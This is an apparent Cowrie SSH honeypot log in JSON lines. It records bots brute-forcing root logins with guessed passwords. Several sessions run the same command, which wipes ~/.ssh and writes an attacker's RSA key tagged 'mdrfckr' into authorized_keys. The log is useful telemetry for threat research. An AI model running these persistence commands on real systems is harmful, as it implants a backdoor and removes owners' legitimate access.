{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:29:39.341468Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:29:39.579715Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:29:39.580655Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55950,"dst_ip":"1.2.3.4","dst_port":22,"session":"68a8ca35fbb1","protocol":"ssh","message":"New connection: 217.72.205.35:55950 (1.2.3.4:22) [session: 68a8ca35fbb1]","sensor":"my-vps","timestamp":"2025-08-26T13:29:40.063596Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:29:40.064753Z","src_ip":"217.72.205.35","session":"68a8ca35fbb1"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":38590,"dst_ip":"1.2.3.4","dst_port":22,"session":"75bff2080860","protocol":"ssh","message":"New connection: 113.141.82.238:38590 (1.2.3.4:22) [session: 75bff2080860]","sensor":"my-vps","timestamp":"2025-08-26T13:29:40.823311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:29:40.824970Z","src_ip":"113.141.82.238","session":"75bff2080860"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:29:41.763461Z","src_ip":"113.141.82.238","session":"75bff2080860"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:29:43.474027Z","src_ip":"113.141.82.238","session":"75bff2080860"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:29:44.713452Z","src_ip":"113.141.82.238","session":"75bff2080860"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":38594,"dst_ip":"1.2.3.4","dst_port":22,"session":"07ce8ee2646e","protocol":"ssh","message":"New connection: 113.141.82.238:38594 (1.2.3.4:22) [session: 07ce8ee2646e]","sensor":"my-vps","timestamp":"2025-08-26T13:29:44.917158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:29:44.917778Z","src_ip":"113.141.82.238","session":"07ce8ee2646e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:29:46.009880Z","src_ip":"113.141.82.238","session":"07ce8ee2646e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:29:46.673346Z","src_ip":"113.141.82.238","session":"07ce8ee2646e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:29:46.887496Z","src_ip":"113.141.82.238","session":"07ce8ee2646e"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:29:46.908494Z","src_ip":"113.141.82.238","session":"48ccb77faee6"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":57046,"dst_ip":"1.2.3.4","dst_port":22,"session":"e53ab48ae54b","protocol":"ssh","message":"New connection: 167.99.49.89:57046 (1.2.3.4:22) [session: e53ab48ae54b]","sensor":"my-vps","timestamp":"2025-08-26T13:30:12.669908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:30:12.670649Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:30:12.762179Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123...","message":"login attempt [root/zxc123...] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.167412Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:13.403318Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.404043Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.405194Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.497925Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:13.740276Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.740960Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.834569Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.835472Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":46166,"dst_ip":"1.2.3.4","dst_port":22,"session":"639b8a51a8a9","protocol":"ssh","message":"New connection: 167.99.49.89:46166 (1.2.3.4:22) [session: 639b8a51a8a9]","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.922763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:30:13.923417Z","src_ip":"167.99.49.89","session":"639b8a51a8a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:30:14.013218Z","src_ip":"167.99.49.89","session":"639b8a51a8a9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:30:14.412916Z","src_ip":"167.99.49.89","session":"639b8a51a8a9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:15.504873Z","src_ip":"167.99.49.89","session":"639b8a51a8a9"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":46174,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3b32d471f6e","protocol":"ssh","message":"New connection: 167.99.49.89:46174 (1.2.3.4:22) [session: d3b32d471f6e]","sensor":"my-vps","timestamp":"2025-08-26T13:30:15.596799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:30:15.597535Z","src_ip":"167.99.49.89","session":"d3b32d471f6e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:30:15.693412Z","src_ip":"167.99.49.89","session":"d3b32d471f6e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:30:16.102585Z","src_ip":"167.99.49.89","session":"d3b32d471f6e"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:16.195463Z","src_ip":"167.99.49.89","session":"e53ab48ae54b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:16.196650Z","src_ip":"167.99.49.89","session":"d3b32d471f6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54006,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a41a36c4121","protocol":"ssh","message":"New connection: 212.227.235.229:54006 (1.2.3.4:22) [session: 0a41a36c4121]","sensor":"my-vps","timestamp":"2025-08-26T13:30:23.236860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:30:23.238408Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:30:23.459128Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer12","message":"login attempt [root/qwer12] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:30:24.417378Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:24.892614Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:30:24.893378Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:30:24.894255Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:25.106263Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:30:25.641306Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:30:25.642028Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:30:25.855698Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:30:25.856783Z","src_ip":"212.227.235.229","session":"0a41a36c4121"}
